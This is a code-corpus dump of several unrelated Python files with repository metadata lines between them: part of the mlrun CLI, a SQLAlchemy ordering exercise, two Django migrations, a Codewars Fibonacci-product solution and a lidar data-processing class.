seconds) that will be given to runtime resources (after they're in terminal state) " "before cleaning them. Ignored when --force is given", show_default=True, ) def clean(kind, object_id, api, label_selector, force, grace_period): """ Clean jobs resources \b Examples: \b # Clean resources for all runs of all runtimes mlrun clean \b # Clean resources for all runs of a specific kind (e.g. job) mlrun clean job \b # Clean resources for specific job (by uid) mlrun clean mpijob 15d04c19c2194c0a8efb26ea3017254b """ mldb = get_run_db(api or mlconf.dbpath) if kind: if object_id: mldb.delete_runtime_object( kind=kind, object_id=object_id, label_selector=label_selector, force=force, grace_period=grace_period, ) else: mldb.delete_runtime( kind=kind, label_selector=label_selector, force=force, grace_period=grace_period, ) else: mldb.delete_runtimes( label_selector=label_selector, force=force, grace_period=grace_period ) @main.command(name="watch-stream") @click.argument("url", type=str) @click.option( "--shard-ids", "-s", multiple=True, type=int, help="shard id to listen on (can be multiple)", ) @click.option("--seek", help="where to start/seek (EARLIEST or LATEST)") @click.option( "--interval", "-i", default=3, show_default=True, help="interval in seconds", type=int, ) @click.option( "--is-json", "-j", is_flag=True, help="indicate the payload is json (will be deserialized)", ) def watch_stream(url, shard_ids, seek, interval, is_json): """watch on a stream and print data every interval""" mlrun.platforms.watch_stream( url, shard_ids, seek, interval=interval, is_json=is_json ) @main.command(name="config") def show_config(): """Show configuration & exit""" print(mlconf.dump_yaml()) def fill_params(params, params_dict=None): params_dict = params_dict or {} for param in params: i = param.find("=") if i == -1: continue key, value = param[:i].strip(), param[i + 1 :].strip() if key is None: raise ValueError(f"cannot find param key in line ({param})") params_dict[key] = py_eval(value) return params_dict def py_eval(data): try: value = literal_eval(data) return value except (SyntaxError, ValueError): return data def set_item(obj, item, key, value=None): if item: if value: setattr(obj, key, value) else: setattr(obj, key, item) def line2keylist(lines: list, keyname="key", valname="path"): out = [] for line in lines: i = line.find("=") if i == -1: raise ValueError(f'cannot find "=" in line ({keyname}={valname})') key, value = line[:i].strip(), line[i + 1 :].strip() if key is None: raise ValueError(f"cannot find key in line ({keyname}={valname})") value = path.expandvars(value) out += [{keyname: key, valname: value}] return out def time_str(x): try: return x.strftime("%b %d %H:%M:%S") except ValueError: return "" def dict_to_str(struct: dict): if not struct: return [] return ",".join([f"{k}={v}" for k, v in struct.items()]) def func_url_to_runtime(func_url): try: if func_url.startswith("db://"): func_url = func_url[5:] project_instance, name, tag, hash_key = parse_versioned_object_uri(func_url) run_db = get_run_db(mlconf.dbpath) runtime = run_db.get_function(name, project_instance, tag, hash_key) else: func_url = "function.yaml" if func_url == "." else func_url runtime = import_function_to_dict(func_url, {}) except Exception as exc: logger.error(f"function {func_url} not found, {exc}") return None if not runtime: logger.error(f"function {func_url} not found or is null") return None return runtime if __name__ == "__main__": main()
32.247505
118
0.609464
31939d900a952ba60adb1c729242ffa07a270d25
678
py
Python
6 - introduction to databases in python/ordering by a Single Column.py
Baidaly/datacamp-samples
09b3e253ec2c503df936298fedc3902413c987b0
[ "MIT" ]
null
null
null
6 - introduction to databases in python/ordering by a Single Column.py
Baidaly/datacamp-samples
09b3e253ec2c503df936298fedc3902413c987b0
[ "MIT" ]
null
null
null
6 - introduction to databases in python/ordering by a Single Column.py
Baidaly/datacamp-samples
09b3e253ec2c503df936298fedc3902413c987b0
[ "MIT" ]
null
null
null
''' To sort the result output by a field, we use the .order_by() method. By default, the .order_by() method sorts from lowest to highest on the supplied column. You just have to pass in the name of the column you want sorted to .order_by(). In the video, for example, Jason used stmt.order_by(census.columns.state) to sort the result output by the state column. ''' # Build a query to select the state column: stmt stmt = select([census.columns.state]) # Order stmt by the state column stmt = stmt.order_by(census.columns.state) # Execute the query and store the results: results results = connection.execute(stmt).fetchall() # Print the first 10 results print(results[:10])
45.2
357
0.755162
561c8a42e1dda3730f77dafbdca28887bd966ba4
473
py
Python
guests/migrations/0007_auto_20160207_2119.py
dannymuchoki/django-wedding-website
4cb322719b04500b587500ea65311f3db302732d
[ "Apache-2.0" ]
null
null
null
guests/migrations/0007_auto_20160207_2119.py
dannymuchoki/django-wedding-website
4cb322719b04500b587500ea65311f3db302732d
[ "Apache-2.0" ]
null
null
null
guests/migrations/0007_auto_20160207_2119.py
dannymuchoki/django-wedding-website
4cb322719b04500b587500ea65311f3db302732d
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # Generated by Django 1.9 on 2016-02-07 21:19 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('guests', '0006_auto_20160207_2116'), ] operations = [ migrations.AlterField( model_name='guest', name='email', field=models.TextField(blank=True, null=True), ), ]
22.52381
59
0.587738
71ba7241d5f75f45dc72521483f256eada1dc0be
2,412
py
Python
codewars/productFib.py
tarcisioallyson/python_exercise
be5257c5cce7c0c2b573ece2308e3b5b03c22fac
[ "Unlicense" ]
null
null
null
codewars/productFib.py
tarcisioallyson/python_exercise
be5257c5cce7c0c2b573ece2308e3b5b03c22fac
[ "Unlicense" ]
null
null
null
codewars/productFib.py
tarcisioallyson/python_exercise
be5257c5cce7c0c2b573ece2308e3b5b03c22fac
[ "Unlicense" ]
null
null
null
""" The Fibonacci numbers are the numbers in the following integer sequence (Fn): 0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, ... such as F(n) = F(n-1) + F(n-2) with F(0) = 0 and F(1) = 1. Given a number, say prod (for product), we search two Fibonacci numbers F(n) and F(n+1) verifying F(n) * F(n+1) = prod. Your function productFib takes an integer (prod) and returns an array: [F(n), F(n+1), true] or {F(n), F(n+1), 1} or (F(n), F(n+1), True) depending on the language if F(n) * F(n+1) = prod. If you don't find two consecutive F(m) verifying F(m) * F(m+1) = prodyou will return [F(m), F(m+1), false] or {F(n), F(n+1), 0} or (F(n), F(n+1), False) F(m) being the smallest one such as F(m) * F(m+1) > prod. Some Examples of Return: (depend on the language) productFib(714) # should return (21, 34, true), # since F(8) = 21, F(9) = 34 and 714 = 21 * 34 productFib(800) # should return (34, 55, false), # since F(8) = 21, F(9) = 34, F(10) = 55 and 21 * 34 < 800 < 34 * 55 ----- productFib(714) # should return [21, 34, true], productFib(800) # should return [34, 55, false], ----- productFib(714) # should return {21, 34, 1}, productFib(800) # should return {34, 55, 0}, ----- productFib(714) # should return {21, 34, true}, productFib(800) # should return {34, 55, false}, """ def productFib(prod): fibo_num = [] prod_fib = [] ctrl = 0 if prod < 5: ctrl = 5 else: ctrl = prod i = 0 while i < ctrl: #calculate fib numbers if len(fibo_num) == 0: fibo_num.append(i) elif len(fibo_num) == 1: fibo_num.append(i) elif len(fibo_num) > 1: fibo_num.append(fibo_num[i-1] + fibo_num[i-2]) #verify condition of product if len(fibo_num) > 1: if fibo_num[i-1] * fibo_num[i] == prod: prod_fib.append(fibo_num[i-1]) prod_fib.append(fibo_num[i]) prod_fib.append(True) break elif fibo_num[i-2] * fibo_num[i-1] < prod < fibo_num[i-1] * fibo_num[i]: prod_fib.append(fibo_num[i-1]) prod_fib.append(fibo_num[i]) prod_fib.append(False) break i+=1 return prod_fib print(productFib(2))
31.324675
98
0.53068
15fa47396cd95eda37541b6461bda9e4e264e546
2,024
py
Python
accounts/migrations/0001_initial.py
hpanwar08/greatkart
834ff9fabdbb9493f54bcfd5d23505831b4a66d2
[ "MIT" ]
null
null
null
accounts/migrations/0001_initial.py
hpanwar08/greatkart
834ff9fabdbb9493f54bcfd5d23505831b4a66d2
[ "MIT" ]
null
null
null
accounts/migrations/0001_initial.py
hpanwar08/greatkart
834ff9fabdbb9493f54bcfd5d23505831b4a66d2
[ "MIT" ]
null
null
null
# Generated by Django 3.2 on 2021-12-22 06:26 from django.db import migrations, models import django.utils.timezone class Migration(migrations.Migration): initial = True dependencies = [ ('auth', '0012_alter_user_first_name_max_length'), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('password', models.CharField(max_length=128, verbose_name='password')), ('first_name', models.CharField(blank=True, max_length=50)), ('last_name', models.CharField(blank=True, max_length=50)), ('username', models.CharField(max_length=50, unique=True)), ('email', models.EmailField(max_length=100, unique=True)), ('phone_number', models.CharField(max_length=50)), ('last_login', models.DateTimeField(default=django.utils.timezone.now, editable=False)), ('date_joined', models.DateTimeField(default=django.utils.timezone.now, editable=False)), ('is_admin', models.BooleanField(default=False)), ('is_staff', models.BooleanField(default=False)), ('is_active', models.BooleanField(default=True)), ('is_superuser', models.BooleanField(default=False)), ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')), ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')), ], options={ 'abstract': False, }, ), ]
50.6
266
0.629447
98775b2b7bba19b7fb3191f4407f514b4ea33aa6
5,003
py
Python
lidardet/datasets/processor/data_processor.py
Jiaolong/trajectory-prediction
3fd4e6253b44dfdc86e7c08e93c002baf66f2e46
[ "Apache-2.0" ]
6
2021-05-10T09:42:01.000Z
2022-01-04T08:03:42.000Z
lidardet/datasets/processor/data_processor.py
Jiaolong/trajectory-prediction
3fd4e6253b44dfdc86e7c08e93c002baf66f2e46
[ "Apache-2.0" ]
3
2021-08-16T02:19:10.000Z
2022-01-10T02:05:48.000Z
lidardet/datasets/processor/data_processor.py
Jiaolong/trajectory-prediction
3fd4e6253b44dfdc86e7c08e93c002baf66f2e46
[ "Apache-2.0" ]
1
2021-07-15T00:51:58.000Z
2021-07-15T00:51:58.000Z
from functools import partial import numpy as np #from ...utils import box_utils, geometry #from ...utils.common import scan_downsample, scan_upsample, scan_to_range class DataProcessor(object): def __init__(self, processor_configs): self.grid_size = self.voxel_size = None self.data_processor_queue = [] for cur_cfg in processor_configs: cur_processor = getattr(self, cur_cfg['name'])(config=cur_cfg) self.data_processor_queue.append(cur_processor) def remove_points_and_boxes_outside_range(self, data_dict=None, config=None): if data_dict is None: return partial(self.remove_points_and_boxes_outside_range, config=config) point_cloud_range = np.array(config['point_cloud_range'], dtype=np.float32) mask = geometry.mask_points_by_range(data_dict['points'], point_cloud_range) data_dict['points'] = data_dict['points'][mask] if data_dict.get('gt_boxes', None) is not None and config['remove_outside_boxes']: mask = box_utils.mask_boxes_outside_range_numpy( data_dict['gt_boxes'], point_cloud_range, min_num_corners=config.get('min_num_corners', 1) ) data_dict['gt_boxes'] = data_dict['gt_boxes'][mask] return data_dict def normalization(self, data_dict=None, config=None): if data_dict is None: return partial(self.normalization, config=config) img = data_dict['range_image_in'] for i in range(img.shape[0]): img[i,...] = (img[i,...] - config['mean'][i]) / config['std'][i] data_dict['range_image_in'] = img return data_dict def shuffle_points(self, data_dict=None, config=None): if data_dict is None: return partial(self.shuffle_points, config=config) points = data_dict['points'] shuffle_idx = np.random.permutation(points.shape[0]) points = points[shuffle_idx] data_dict['points'] = points return data_dict def get_range_image(self, data_dict=None, config=None): if data_dict is None: return partial(self.get_range_image, config=config) points = data_dict['points'] range_image, _, _ = scan_to_range(points, normalize=True) range_image = range_image[:,:,:2] data_dict['range_image_even'] = range_image[::2, :, :].transpose((2, 0, 1)) data_dict['range_image_odd'] = range_image[1::2, :, :].transpose((2, 0, 1)) if 'points' in data_dict: data_dict.pop('points') if 'gt_boxes' in data_dict: data_dict.pop('gt_boxes') return data_dict def scan_downsample(self, data_dict=None, config=None): if data_dict is None: return partial(self.scan_downsample, config=config) points = data_dict['points'] points_lr = scan_downsample(points) data_dict['points'] = points_lr return data_dict def scan_upsample(self, data_dict=None, config=None): if data_dict is None: return partial(self.scan_upsample, config=config) points = data_dict['points'] points_dense = scan_upsample(points) data_dict['points'] = points_dense return data_dict def voxelization(self, data_dict=None, config=None, voxel_generator=None): if data_dict is None: from spconv.utils import VoxelGenerator point_cloud_range = np.array(config['point_cloud_range'], dtype=np.float32) voxel_generator = VoxelGenerator( voxel_size=config['voxel_size'], point_cloud_range=point_cloud_range, max_num_points=config['max_points_per_voxel'], max_voxels=config['max_num_voxels'], full_mean=False ) grid_size = (point_cloud_range[3:6] - point_cloud_range[0:3]) / np.array(config['voxel_size']) self.grid_size = np.round(grid_size).astype(np.int64) self.voxel_size = config['voxel_size'] return partial(self.voxelization, voxel_generator=voxel_generator) points = data_dict['points'] voxels, coordinates, num_points = voxel_generator.generate(points) data_dict['use_lead_xyz'] = True #if not data_dict['use_lead_xyz']: # voxels = voxels[..., 3:] # remove xyz in voxels(N, 3) data_dict['voxels'] = voxels data_dict['voxel_coords'] = coordinates data_dict['voxel_num_points'] = num_points return data_dict def forward(self, data_dict): """ Args: data_dict: points: (N, 3 + C_in) gt_boxes: optional, (N, 7 + C) [x, y, z, dx, dy, dz, heading, ...] gt_names: optional, (N), string ... Returns: """ for cur_processor in self.data_processor_queue: data_dict = cur_processor(data_dict=data_dict) return data_dict
40.674797
106
0.630022